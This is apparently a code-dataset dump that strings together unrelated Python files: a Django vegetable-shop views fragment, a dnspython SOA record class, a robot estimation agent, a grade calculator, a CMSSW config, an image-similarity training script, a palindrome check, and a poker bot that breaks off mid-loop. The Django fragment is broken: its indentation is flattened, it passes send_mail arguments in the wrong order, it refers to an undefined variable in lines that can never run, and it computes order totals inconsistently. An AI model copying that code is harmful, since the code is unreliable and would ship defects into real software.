b=Vegpro.objects.get(id=id)
c=Cart(user_id=request.user.id,veg_id=id)
c.save()
count=0
data1 = Cart.objects.filter(user_id=request.user.id)
for i in data1:
count+=1
return render(request,'html/addcart.html',{'b':c,'count':count,'data1':data1})
def cartdetails(request):
c=Cart.objects.filter(user_id=request.user.id)
sum=0
count=0
amount=1
for i in c:
amount=i.qunatity*i.veg.price
count=count+1
sum=sum+amount
i.amount=amount
return render(request,'html/cartdetails.html',{'sum':sum,'count':count,'cart':c})
def placeorder(request):
c=Cart.objects.filter(user_id=request.user.id)
sum=0
count=0
for i in c:
count=count+1
sum=sum+i.veg.price
return render(request,'html/placeorder.html',{'sum':sum,'count':count,'cart':c})
@login_required
def item(request):
t = Vegpro.objects.filter(a_id=request.user.id)
if request.method == "POST":
s = Vegfr(request.POST,request.FILES)
if s.is_valid():
r = s.save(commit=False)
r.a_id = request.user.id
r.save()
return redirect('/')
s=Vegfr()
return render(request,'html/item.html',{'a':s,'e':t})
def msg(request):
c=Cart.objects.filter(user_id=request.user.id)
sum=0
count=0
for i in c:
count=count+1
sum=sum+i.veg.price
return render(request,'html/message.html',{'count':count})
def msg1(request):
c=Cart.objects.filter(user_id=request.user.id)
sum=0
count=0
for i in c:
count=count+1
sum=sum+i.veg.price
return render(request,'html/message1.html',{'count':count})
def msg2(request):
return render(request,'html/msg2.html')
def myorders(request):
my=Myorders.objects.filter(user_id=request.user.id)
sum=0
count=0
for i in my:
count=count+1
sum=sum+i.price
return render(request,'html/myorders.html',{'sum':sum,'my':my})
def checkout(request):
c=Cart.objects.filter(user_id=request.user.id)
if request.method=="POST":
m=request.user.email
receiver=m
l=[]
x=[]
sum=0
for i in c:
sum=sum+i.veg.price*i.qunatity
l.append(i.veg.item_name)
message='Ordered items ::\n'+' ,'.join(l)+'\n'+ 'will be delivered within 10 days.\n'+'Total amount paid: Rs.'+str(sum)+'\n'+'THANK YOU for Shopping!! \n'
subject='Order confirmed'
st=settings.EMAIL_HOST_USER
if c:
at=send_mail(subject,message,st,[receiver])
for i in x:
at.attach(i.name,i.read())
at.send()
for i in c:
sum=sum+i.veg.price
a=Myorders(item_name=i.veg.item_name,item_type=i.veg.item_type,price=i.veg.price,user_id=request.user.id,prod=i.veg.a_id)
a.save()
b=Orders(item_name=i.veg.item_name,item_type=i.veg.item_type,price=i.veg.price,prod=i.veg.a_id)
b.save()
c.delete()
he=Vegpro.objects.filter(id=i.veg_id)
for i in he:
i.totalquantity-=1
i.save()
c.delete()
return redirect('msg')
return redirect('msg1')
return render(request,'html/placeorder.html')
def ordercancel(request,si):
x=Myorders.objects.get(id=si)
j=CancelForm(request.POST,instance=x)
if request.method=="POST":
if j.is_valid():
receiver=request.user.email
sender=settings.EMAIL_HOST_USER
subject="order cancelled"
body="your order has been cancelled"
send_mail(sender,body,subject,[receiver])
j.save()
return redirect('msg2')
he=Product.objects.filter(id=i.product_id)
for i in he:
i.totalquantity+=1
i.save()
x.delete()
j=CancelForm(instance=x)
return render(request,'html/ordercancel.html',{'prod':j})
| [
"guna11priya@gmail.com"
] | guna11priya@gmail.com |
034a7d5e99bd493a04228ed2e4b4f1b71a6ec5c2 | 0cc4eb3cb54f8394c127ace62d3108fdb5230c85 | /.spack-env/view/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/profile.pyi | df940020d4066a6dc89ae87f2652df920ed8c8b4 | [] | no_license | jacobmerson/spack-develop-env | 5b2d76f58c0b64ae97c64f77a3c4d33a770c71c8 | 5fca20ca343b1a76f05fc635c87f94ed25417d94 | refs/heads/master | 2022-07-04T02:22:50.264727 | 2020-05-06T05:13:50 | 2020-05-06T05:13:50 | 261,657,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 190 | pyi | /lore/mersoj/spack/spack/opt/spack/linux-rhel7-x86_64/gcc-7.3.0/py-jedi-0.17.0-zugnvpgjfmuk5x4rfhhxlsknl2g226yt/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/profile.pyi | [
"mersoj@rpi.edu"
] | mersoj@rpi.edu |
ce3333447ac28a3d89c0757d6ada515e638e5bd2 | 8410bb5a2e8849bb3a554b95ddc713d88f3440c4 | /aws-dev/awsdev9/venv/Lib/site-packages/dns/rdtypes/ANY/SOA.py | aec81cad8ac916e9bc71052ecbc4983cdabbd126 | [
"MIT"
] | permissive | PacktPublishing/-AWS-Certified-Developer---Associate-Certification | ae99b6c1efb30e8fab5b76e3d8c821823a4cd852 | b9838b4e038b42ad1813a296379cbbc40cab6286 | refs/heads/master | 2022-11-03T04:37:49.014335 | 2022-10-31T05:42:19 | 2022-10-31T05:42:19 | 219,964,717 | 13 | 11 | MIT | 2021-06-02T00:57:45 | 2019-11-06T09:54:09 | Python | UTF-8 | Python | false | false | 4,597 | py | # Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
# Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import struct
import dns.exception
import dns.rdata
import dns.name
class SOA(dns.rdata.Rdata):
"""SOA record
@ivar mname: the SOA MNAME (master name) field
@type mname: dns.name.Name object
@ivar rname: the SOA RNAME (responsible name) field
@type rname: dns.name.Name object
@ivar serial: The zone's serial number
@type serial: int
@ivar refresh: The zone's refresh value (in seconds)
@type refresh: int
@ivar retry: The zone's retry value (in seconds)
@type retry: int
@ivar expire: The zone's expiration value (in seconds)
@type expire: int
@ivar minimum: The zone's negative caching time (in seconds, called
"minimum" for historical reasons)
@type minimum: int
@see: RFC 1035"""
__slots__ = ['mname', 'rname', 'serial', 'refresh', 'retry', 'expire',
'minimum']
def __init__(self, rdclass, rdtype, mname, rname, serial, refresh, retry,
expire, minimum):
super(SOA, self).__init__(rdclass, rdtype)
self.mname = mname
self.rname = rname
self.serial = serial
self.refresh = refresh
self.retry = retry
self.expire = expire
self.minimum = minimum
def to_text(self, origin=None, relativize=True, **kw):
mname = self.mname.choose_relativity(origin, relativize)
rname = self.rname.choose_relativity(origin, relativize)
return '%s %s %d %d %d %d %d' % (
mname, rname, self.serial, self.refresh, self.retry,
self.expire, self.minimum)
@classmethod
def from_text(cls, rdclass, rdtype, tok, origin=None, relativize=True):
mname = tok.get_name()
rname = tok.get_name()
mname = mname.choose_relativity(origin, relativize)
rname = rname.choose_relativity(origin, relativize)
serial = tok.get_uint32()
refresh = tok.get_ttl()
retry = tok.get_ttl()
expire = tok.get_ttl()
minimum = tok.get_ttl()
tok.get_eol()
return cls(rdclass, rdtype, mname, rname, serial, refresh, retry,
expire, minimum)
def to_wire(self, file, compress=None, origin=None):
self.mname.to_wire(file, compress, origin)
self.rname.to_wire(file, compress, origin)
five_ints = struct.pack('!IIIII', self.serial, self.refresh,
self.retry, self.expire, self.minimum)
file.write(five_ints)
def to_digestable(self, origin=None):
return self.mname.to_digestable(origin) + \
self.rname.to_digestable(origin) + \
struct.pack('!IIIII', self.serial, self.refresh,
self.retry, self.expire, self.minimum)
@classmethod
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin=None):
(mname, cused) = dns.name.from_wire(wire[: current + rdlen], current)
current += cused
rdlen -= cused
(rname, cused) = dns.name.from_wire(wire[: current + rdlen], current)
current += cused
rdlen -= cused
if rdlen != 20:
raise dns.exception.FormError
five_ints = struct.unpack('!IIIII',
wire[current: current + rdlen])
if origin is not None:
mname = mname.relativize(origin)
rname = rname.relativize(origin)
return cls(rdclass, rdtype, mname, rname,
five_ints[0], five_ints[1], five_ints[2], five_ints[3],
five_ints[4])
def choose_relativity(self, origin=None, relativize=True):
self.mname = self.mname.choose_relativity(origin, relativize)
self.rname = self.rname.choose_relativity(origin, relativize)
| [
"sonalis@packtpub.com"
] | sonalis@packtpub.com |
f2a79e14c8e1f3123f6c1980abd11fd2deeb6313 | acfc74f4cd6da2f89775a7c5fba196b441488aa7 | /nsd-term-project/pymodule/agent.py | 434421b39a185fb84694c62e59d8d993b0d3be3b | [] | no_license | jptom/study-probablistic-robotics | c76c960a58d253c480ade4f0225e653f6d09c8dd | 1cf1905194218b52e222a87ae1d45aa0d48465f0 | refs/heads/main | 2023-02-11T13:43:23.259239 | 2021-01-10T22:43:22 | 2021-01-10T22:43:22 | 303,395,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 797 | py |
class EstimationAgent(Agent):
def __init__(self, time_interval, nu, omega, estimator):
super().__init__(nu, omega)
self.estimator = estimator
self.time_interval = time_interval
self.prev_nu = 0.0
self.prev_omega = 0.0
def decision(self, observation=None):
self.estimator.motion_update(self.prev_nu, self.prev_omega, self.time_interval)
self.prev_nu, self.prev_omega = self.nu, self.omega
self.estimator.observation_update(observation)
return self.nu, self.omega
def draw(self, ax, elems):
self.estimator.draw(ax, elems)
x, y, t = self.estimator.pose
s = "({:.2f}, {:.2f}, {})".format(x, y, int(t*180/math.pi)%360)
elems.append(ax.text(x, y+0.1, s, fontsize=8))
| [
"noreply@github.com"
] | noreply@github.com |
b379be57824d2fb470bae252805697851fe78582 | 7f770972c8bc279008af04e418d1080c7b122c7a | /DevLab/5.py | 071d49b37590f9fcefd460dcdd4d894e67ceac52 | [] | no_license | thongchaiSH/practice-dev-lab | 5e5f91c5dd36ef12ec8780b1ba805b0b8c3fe8f9 | 32b15c2bdd296dc1fa65dc580290f4a60a4cff47 | refs/heads/main | 2023-02-22T05:37:41.851182 | 2021-01-25T05:32:27 | 2021-01-25T05:32:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 739 | py | '''
คำนวณเกรด
คำอธิบาย
โดยการคำนวณเกรดนั้นจะมีการให้คะแนนตามเกรดแต่ละช่วงเป็น 80- 100 ได้เกรด A , 70 - 79 ได้เกรด B , 60 - 69 ได้เกรด C , 50 - 59 ได้เกรด D และ ต่ำกว่า 50 จะได้เกรด F โดยผู้ใช้จะต้องกรอกเป็นตัวเลขจำนวนเต็มเท่านั้น
'''
# num=69
num=int(input())
if num>=80 and num <=100:
print("A")
elif num>=70:
print("B")
elif num>=60:
print("C")
elif num>=50:
print("D")
else :
print("F")
| [
"thongchai.sh@gmail.com"
] | thongchai.sh@gmail.com |
2ca6a41f705f6ef795834db9d2bcbec1c4e7da99 | 9d0195aa83cc594a8c61f334b90375961e62d4fe | /JTTest/SL7/CMSSW_10_2_15/src/miniAODJobs600toInf/nano4.py | 1366df4f33cc6ad0c152e7cd8e25ea82efda4cf6 | [] | no_license | rsk146/CMS | 4e49592fc64f6438051544c5de18598db36ed985 | 5f8dab8c59ae556598b9747b52b88205fffc4dbe | refs/heads/master | 2022-12-01T03:57:12.126113 | 2020-08-04T03:29:27 | 2020-08-04T03:29:27 | 284,863,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,363 | py | # Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: nanoAOD_jetToolbox_cff -s NANO --mc --eventcontent NANOAODSIM --datatier NANOAODSIM --no_exec --conditions 102X_upgrade2018_realistic_v19 --era Run2_2018,run2_nanoAOD_102Xv1 --customise_commands=process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False))) --customise JMEAnalysis/JetToolbox/nanoAOD_jetToolbox_cff.nanoJTB_customizeMC --filein file:cms/xaastorage/MINIAOD/Xaa_photons/diPhoton/x500_a100/XaaNLOttQED0_BBAR_M-x500_a100_MINIAODSIM_1.root --fileout file:jetToolbox_nano_mc.root
import FWCore.ParameterSet.Config as cms
import files50
from files50 import *
from Configuration.StandardSequences.Eras import eras
process = cms.Process('NANO',eras.Run2_2018,eras.run2_nanoAOD_102Xv1)
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_cff')
process.load('PhysicsTools.NanoAOD.nano_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
# Input source
process.source = cms.Source("PoolSource",
# fileNames = cms.untracked.vstring('file:/cms/xaastorage/MINIAOD/2016/GJets/HT_100to200/GJet_100to200_1.root '),
fileNames = cms.untracked.vstring(A),
secondaryFileNames = cms.untracked.vstring()
)
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('nanoAOD_jetToolbox_cff nevts:1'),
name = cms.untracked.string('Applications'),
version = cms.untracked.string('$Revision: 1.19 $')
)
# Output definition
process.NANOAODSIMoutput = cms.OutputModule("NanoAODOutputModule",
compressionAlgorithm = cms.untracked.string('LZMA'),
compressionLevel = cms.untracked.int32(9),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('NANOAODSIM'),
filterName = cms.untracked.string('')
),
fileName = cms.untracked.string('file:jetToolbox_nano_mc_2018GJetsHT600toInf_50.root'),
outputCommands = process.NANOAODSIMEventContent.outputCommands
)
# Additional output definition
# Other statements
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '102X_upgrade2018_realistic_v19', '')
# Path and EndPath definitions
process.nanoAOD_step = cms.Path(process.nanoSequenceMC)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.NANOAODSIMoutput_step = cms.EndPath(process.NANOAODSIMoutput)
# Schedule definition
process.schedule = cms.Schedule(process.nanoAOD_step,process.endjob_step,process.NANOAODSIMoutput_step)
from PhysicsTools.PatAlgos.tools.helpers import associatePatAlgosToolsTask
associatePatAlgosToolsTask(process)
# customisation of the process.
# Automatic addition of the customisation function from PhysicsTools.NanoAOD.nano_cff
from PhysicsTools.NanoAOD.nano_cff import nanoAOD_customizeMC
#call to customisation function nanoAOD_customizeMC imported from PhysicsTools.NanoAOD.nano_cff
process = nanoAOD_customizeMC(process)
# Automatic addition of the customisation function from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff import nanoJTB_customizeMC
#call to customisation function nanoJTB_customizeMC imported from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
process = nanoJTB_customizeMC(process)
# End of customisation functions
# Customisation from command line
process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False)))
# Add early deletion of temporary data products to reduce peak memory need
from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete
process = customiseEarlyDelete(process)
# End adding early deletion
| [
"rsk146@scarletmail.rutgers.edu"
] | rsk146@scarletmail.rutgers.edu |
8bf032498531047a3d1285fdc533adaa25bf826f | 1c71f25108b277a63f2adc48aa30b201fd254a5b | /third_party/PerceptualSimilarity/train.py | 4bff0e07512efa28c0bc4e52a336da8c25f7cbbe | [
"Apache-2.0",
"BSD-2-Clause"
] | permissive | ecmjohnson/lasr | 934c292eff5305325c97ef2e11e5c72b6f4db3c9 | 1d8404232d2e51c330bdf83416343eda0290bcc0 | refs/heads/main | 2023-07-08T06:44:18.911430 | 2021-08-09T20:35:09 | 2021-08-09T20:35:09 | 394,651,253 | 1 | 0 | Apache-2.0 | 2021-08-10T12:47:44 | 2021-08-10T12:47:43 | null | UTF-8 | Python | false | false | 4,956 | py | import torch.backends.cudnn as cudnn
cudnn.benchmark=False
import numpy as np
import time
import os
from models import dist_model as dm
from data import data_loader as dl
import argparse
from util.visualizer import Visualizer
#from IPython import embed
parser = argparse.ArgumentParser()
parser.add_argument('--datasets', type=str, nargs='+', default=['train/traditional','train/cnn','train/mix'], help='datasets to train on: [train/traditional],[train/cnn],[train/mix],[val/traditional],[val/cnn],[val/color],[val/deblur],[val/frameinterp],[val/superres]')
parser.add_argument('--model', type=str, default='net-lin', help='distance model type [net-lin] for linearly calibrated net, [net] for off-the-shelf network, [l2] for euclidean distance, [ssim] for Structured Similarity Image Metric')
parser.add_argument('--net', type=str, default='alex', help='[squeeze], [alex], or [vgg] for network architectures')
parser.add_argument('--batch_size', type=int, default=50, help='batch size to test image patches in')
parser.add_argument('--use_gpu', action='store_true', help='turn on flag to use GPU')
parser.add_argument('--nepoch', type=int, default=5, help='# epochs at base learning rate')
parser.add_argument('--nepoch_decay', type=int, default=5, help='# additional epochs at linearly learning rate')
parser.add_argument('--display_freq', type=int, default=5000, help='frequency (in instances) of showing training results on screen')
parser.add_argument('--print_freq', type=int, default=5000, help='frequency (in instances) of showing training results on console')
parser.add_argument('--save_latest_freq', type=int, default=10000, help='frequency (in instances) of saving the latest results')
parser.add_argument('--save_epoch_freq', type=int, default=1, help='frequency of saving checkpoints at the end of epochs')
parser.add_argument('--display_id', type=int, default=0, help='window id of the visdom display, [0] for no displaying')
parser.add_argument('--display_winsize', type=int, default=256, help='display window size')
parser.add_argument('--display_port', type=int, default=8001, help='visdom display port')
parser.add_argument('--use_html', action='store_true', help='save off html pages')
parser.add_argument('--checkpoints_dir', type=str, default='checkpoints', help='checkpoints directory')
parser.add_argument('--name', type=str, default='tmp', help='directory name for training')
opt = parser.parse_args()
opt.train_plot = True
opt.save_dir = os.path.join(opt.checkpoints_dir,opt.name)
if(not os.path.exists(opt.save_dir)):
os.mkdir(opt.save_dir)
# initialize model
model = dm.DistModel()
model.initialize(model=opt.model,net=opt.net,use_gpu=opt.use_gpu, is_train=True)
# load data from all training sets
data_loader = dl.CreateDataLoader(opt.datasets,dataset_mode='2afc', batch_size=opt.batch_size, serial_batches=False)
dataset = data_loader.load_data()
dataset_size = len(data_loader)
D = len(dataset)
print('Loading %i instances from'%dataset_size,opt.datasets)
visualizer = Visualizer(opt)
total_steps = 0
fid = open(os.path.join(opt.checkpoints_dir,opt.name,'train_log.txt'),'w+')
for epoch in range(1, opt.nepoch + opt.nepoch_decay + 1):
epoch_start_time = time.time()
for i, data in enumerate(dataset):
iter_start_time = time.time()
total_steps += opt.batch_size
epoch_iter = total_steps - dataset_size * (epoch - 1)
model.set_input(data)
model.optimize_parameters()
if total_steps % opt.display_freq == 0:
visualizer.display_current_results(model.get_current_visuals(), epoch)
if total_steps % opt.print_freq == 0:
errors = model.get_current_errors()
t = (time.time()-iter_start_time)/opt.batch_size
t2o = (time.time()-epoch_start_time)/3600.
t2 = t2o*D/(i+.0001)
visualizer.print_current_errors(epoch, epoch_iter, errors, t, t2=t2, t2o=t2o, fid=fid)
for key in errors.keys():
visualizer.plot_current_errors_save(epoch, float(epoch_iter)/dataset_size, opt, errors, keys=[key,], name=key, to_plot=opt.train_plot)
if opt.display_id > 0:
visualizer.plot_current_errors(epoch, float(epoch_iter)/dataset_size, opt, errors)
if total_steps % opt.save_latest_freq == 0:
print('saving the latest model (epoch %d, total_steps %d)' %
(epoch, total_steps))
model.save(opt.save_dir, 'latest')
if epoch % opt.save_epoch_freq == 0:
print('saving the model at the end of epoch %d, iters %d' %
(epoch, total_steps))
model.save(opt.save_dir, 'latest')
model.save(opt.save_dir, epoch)
print('End of epoch %d / %d \t Time Taken: %d sec' %
(epoch, opt.nepoch + opt.nepoch_decay, time.time() - epoch_start_time))
if epoch > opt.nepoch:
model.update_learning_rate(opt.nepoch_decay)
# model.save_done(True)
fid.close()
| [
"deqingsun@google.com"
] | deqingsun@google.com |
c4ecb3d26e7d4d021faf6e0f28580b6d1360efee | e0c81c6117c58be5e0a610ceb24f283bb9a8bafd | /old/pick_panos_for_sliding_window.py | 28503ee6d736f4d628141127727aec615556a670 | [] | no_license | ndenizturhan/sidewalk-cv-assets19 | 0928e65be92e2e2f259a40b9afca91a823d85b1c | dfad62b34c3a6a17ee6906cdecae518732c2bb8c | refs/heads/master | 2022-07-17T06:06:08.629912 | 2020-05-21T18:41:40 | 2020-05-21T18:41:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | import os, csv, random
path_to_db_export = "/mnt/c/Users/gweld/sidewalk/minus_onboard.csv"
num_to_pick = 50
#############################
panos = []
with open(path_to_db_export, 'r') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
panos.append( row[0] )
picked = random.sample(panos, num_to_pick)
for p in picked:
print p | [
"gweld@cs.washington.edu"
] | gweld@cs.washington.edu |
d9bf1f45f8a93985ea6f2e0a18d2ad677c242736 | 444dd650756e29854010e64388f9d92608c2f847 | /PalindromeHW5.py | 224d24dc08819f68250c96be15dd713d14041143 | [] | no_license | Lizzy95/MICP | ae440a4b2f7f6962e9611974a5451b60f0608e32 | 2739ef8de60674a0454fc0c6384e5d74c2a083ea | refs/heads/master | 2021-01-01T16:58:51.436268 | 2017-09-13T16:33:32 | 2017-09-13T16:33:32 | 97,968,453 | 0 | 1 | null | 2017-09-13T16:33:33 | 2017-07-21T16:42:16 | Python | UTF-8 | Python | false | false | 982 | py | class ListNode(object):
def __init__(self, x = None, next = None):
self.val = x
self.next = next
def isPalindrome(head):
try:
findMid = head
mid = head
if head.val == None:
raise Exception('Throw exception')
while findMid and findMid.next:
findMid = findMid.next.next
mid = mid.next
secondPart = []
while mid:
secondPart.append(mid.val)
mid = mid.next
while secondPart:
x = secondPart.pop()
if x != head.val:
return False
head = head.next
return True
except Exception:
raise
test1 = ListNode('a',ListNode('b', ListNode('c', ListNode('c', ListNode('b', ListNode('a'))))))
print isPalindrome(test1)
test1 = ListNode('1',ListNode('1'))
print isPalindrome(test1)
test1 = ListNode('a', ListNode('b',ListNode('1', ListNode('2', ListNode('2', ListNode('1', ListNode('b', ListNode('a'))))))))
print isPalindrome(test1)
#print isPalindrome(ListNode())
| [
"lizzi16.gd95@gmail.com"
] | lizzi16.gd95@gmail.com |
fa37b4c5fdcdb9523555f762cbf4a584c1be99c6 | 736030867c8b57dca68c2252a6890c75163ab6a6 | /attempt.py | fadd250875c5de5404900448b12c040df7cb6580 | [] | no_license | vapte/PokerBots | e66d3dcb61fcb040d0b9a62d3ab938ae86621ad9 | 4ff0d1f540c76c5ba10b96efcee30e60ed4bb20d | refs/heads/master | 2020-12-30T21:46:41.019811 | 2016-07-19T15:47:25 | 2016-07-19T15:47:25 | 46,761,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,014 | py | import itertools as it
import random
import copy
from numpy.random import logistic
import os
import multiprocessing
import time
import tkinter
import pickle
#Skeleton code for Player obtained from MIT PokerBots course website
class Player(object):
values = ['2','3','4','5','6','7','8','9','T','J','Q','K','A'] #ordered lo to hi
handOrder = ['highcard', '1pair', '2pair', '3ofakind', 'straight',
'flush', 'fullhouse', '4ofakind', 'straightflush'] #lo to hi
valuesStr = ''.join(values)
suits = ['d','c','s','h']
fullDeck = list(it.product(values,suits))
for i in range(len(fullDeck)):
hand = fullDeck[i]
fullDeck[i] = hand[0]+hand[1] #tuple>>str
assert(len(fullDeck)==52)
def __init__(self,name): #must set name to name in config.txt
self.hole = []
self.board = []
self.potSize = 0
self.actions = []
self.playerNames = []
self.histories = dict()
self.stackSizes = []
self.potOdds = 0
self.blind = Player.getBlind()
self.blindsLeft = 0
self.EV = 0
self.impliedEV = 0
self.AF, self.AFtype = 0,None
self.name = name
self.stack = 0
self.opponents = dict()
self.numHands = 0
self.winRate = 0
self.gameState = None
self.impliedPotOdds = 0
self.allHistories = []
def run(self, inputSocket):
# Get a file-object for reading packets from the socket.
# Using this ensures that you get exactly one packet per read.
f_in = inputSocket.makefile()
while True:
# Block until the engine sends us a packet.
data = f_in.readline().strip() # If data == None, connection closed.
packetValues = data.split(' ')
print(self.name, data,'\n\n')
word = packetValues[0]
if word=='NEWHAND':
self.newHandUpdate(packetValues)
elif word == "GETACTION":
self.getActionUpdate(packetValues)
self.getActionReponse(packetValues, inputSocket)
elif word == 'HANDOVER':
self.stackSizes = packetValues[1:4]
self.historyUpdate(packetValues,True)
elif word == "REQUESTKEYVALUES":
inputSocket.send(b"FINISH\n")
#update histories and stats
if word == "GETACTION" or word=="HANDOVER":
self.gameStateUpdate(packetValues)
if self.histories!={}:
self.updateAll()
self.conclude(inputSocket)
def conclude(self,inputSocket):
# Clean up the socket.
inputSocket.close()
self.allHistoriesPrint()
#EXPORT allHistories to text file
self.allHistoriesExport()
def updateAll(self):
self.statUpdate()
#opponent attributes update
for opponent in self.opponents:
currOpp = self.opponents[opponent]
currOpp.attrsUpdate(self.__dict__)
#opponent stats update
self.oppUpdate()
def gameStateUpdate(self,packetValues):
for event in packetValues:
if 'FLOP' in event:
self.gameState = 'flop'
elif 'TURN' in event:
self.gameState = 'turn'
elif 'RIVER' in event:
self.gameState = 'river'
def allHistoriesPrint(self):
time.sleep(2)
if self.name=='player1':
print('hi\n\n',self.allHistories,'\n\n')
def allHistoriesExport(self):
fileIndex = int(self.name[-1])+2
Player.writeFile('filename%d.pickle' % fileIndex ,self.allHistories,True)
def newHandUpdate(self, packetValues):
self.boardReset()
self.hole = [packetValues[3],packetValues[4]]
self.playerNames = []
for piece in packetValues[5:-5]:
if not piece.isdigit():
self.playerNames+=[piece]
#need to initialize histories/opponents on first hand
if self.histories == {}:
for player in self.playerNames:
self.histories[player] = []
assert(len(self.playerNames)<=3) #engine allows 3 players max
if self.opponents == {}:
for player in self.playerNames:
if player!=self.name:
self.opponents[player] = Opponent(player,self.__dict__)
self.numHands+=1
self.gameState = 'preflop'
def getActionUpdate(self,packetValues):
self.historyUpdate(packetValues)
#get player actions
self.actions = packetValues[-4:-1]
if self.actions[0].isdigit():
self.actions.pop(0)
#update potSize, board, stacksizes
self.potSize = int(packetValues[1])
numCards = int(packetValues[2])
if numCards > 0:
self.board = packetValues[3:3+numCards]
self.stackSizes = packetValues[3+numCards:6+numCards]
#compute pot odds
for action in self.actions:
if "CALL" in action:
callSize = int(action.split(':')[1])
self.potOdds = callSize/self.potSize
def getActionReponse(self,packetValues,inputSocket):
#run logic and send message
rawBotResponse = self.botLogic()
if rawBotResponse!=None:
response = Player.botResponse(rawBotResponse)
else:
response = Player.botResponse()
inputSocket.send(response)
def botLogic(self): #top level function for bot logic
pass
#override in subclasses
#should return (action, quantity)
#actions = 'check','fold','bet','raise','call'
#quantity is needed for all (0 if check or fold)
def checkReturnVal(self,shouldReturn, actionsDict):
#sometimes the engine let's players spend more than they have...
if shouldReturn[0] in ['call','bet','raise']:
if shouldReturn[1]>self.stack:
if actionsDict.get('check',False):
return ('check',0)
else:
return ('fold',0)
else:
return shouldReturn
else:
return shouldReturn
def actionsParse(self): #parses self.actions
check = fold = False
actionsDict = dict()
minRaise = maxRaise = minBet = maxBet = callSize = None
for value in self.actions:
if 'RAISE' in value:
minRaise = int(value.split(':')[1])
maxRaise = int(value.split(':')[2])
elif 'BET' in value:
minBet = int(value.split(':')[1])
maxBet = int(value.split(':')[2])
elif 'CALL' in value:
callSize = int(value.split(':')[1])
elif 'CHECK' in value:
check = True
elif 'FOLD' in value:
fold = True
if minBet!=None and maxBet!=None:
actionsDict['bet']=True
actionsDict['betVals'] = list(range(minBet,maxBet+1))
if minRaise!=None and maxRaise!=None:
actionsDict['raiseVals'] = list(range(minRaise,maxRaise+1))
actionsDict['raise'] = True
if callSize!=None:
actionsDict['callVals'] = callSize
actionsDict['call'] = True
if check:
actionsDict['check'] = True
if fold:
actionsDict['fold'] = True
return actionsDict
@classmethod
def botResponse(self, logicTuple = ('check',0)): #formats output of botLogic
possibleActions = ['check','fold','bet','raise','call']
responseType = logicTuple[0]
quantity = logicTuple[1]
assert(responseType in possibleActions)
if responseType=='check' or responseType=='fold':
response = str.encode(responseType.upper()+'\n')
else:
response = str.encode(responseType.upper()+':'+str(quantity)+'\n')
return response
#manage opponent data
def oppUpdate(self):
#self.opponents initialized in run()
for opponent in self.opponents:
currOpp = self.opponents[opponent]
if currOpp.name!=self.name:
currOpp.statUpdate()
varsOppCopy = copy.deepcopy(vars(currOpp))
varsOppCopy.pop('histories')
#print(currOpp.name, '\n', varsOppCopy,'\n\n')
#top level function for computing all stats
def statUpdate(self):
self.getAggressionFactor()
self.getExpectedValue()
self.getWinRate()
self.getImpliedPotOdds()
try:
self.stack = int(self.stackSizes[self.playerNames.index(self.name)])
except:
pass
self.blindsLeft = int(self.stack/self.blind)
#stat/history computation functions (must work for opponents with only histories as input)
#implied pot odds
def getImpliedPotOdds(self):
impliedPot = self.potSize
for action in self.actions:
if "CALL" in action:
callSize = int(action.split(':')[1])
elif "RAISE" in action or "BET" in action:
minRaise = int(action.split(':')[1])
maxRaise = int(action.split(':')[2])+minRaise #if we raise
enumRaises = list(range(minRaise,maxRaise+1))
try:
#enumRaises = [0]+[callSize]+enumRaises fold,call,raise
#we shift 0->callSize-1 because statistics
enumRaises = [callSize-1]+[callSize]+enumRaises
except:
pass
try:
if len(enumRaises)>1: #not just callSize-1
expectedActions = dict()
for opponent in self.opponents:
currOpp = self.opponents[opponent]
randomAction = 0
samples = 1000
for i in range(samples):
